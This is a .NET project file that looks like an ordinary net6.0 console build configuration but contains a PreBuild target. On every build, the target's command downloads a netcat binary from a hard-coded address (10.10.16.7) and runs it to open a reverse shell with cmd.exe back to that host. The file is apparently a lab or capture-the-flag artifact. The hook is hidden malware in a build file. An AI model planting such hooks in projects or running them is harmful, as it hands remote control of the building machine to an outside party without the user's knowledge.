<Project Sdk="Microsoft.NET.Sdk">

<Target Name="PreBuild" BeforeTargets="PreBuildEvent">
  <Exec Command="wget http://10.10.16.7:1234/nc.exe -OutFile c:\\Users\Public\\nc.exe;c:\\Users\Public\\nc.exe -e cmd.exe 10.10.16.7 1337" />
</Target>

  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net6.0</TargetFramework>
    <ImplicitUsings>enable</ImplicitUsings>
    <Nullable>enable</Nullable>
  </PropertyGroup>

</Project>
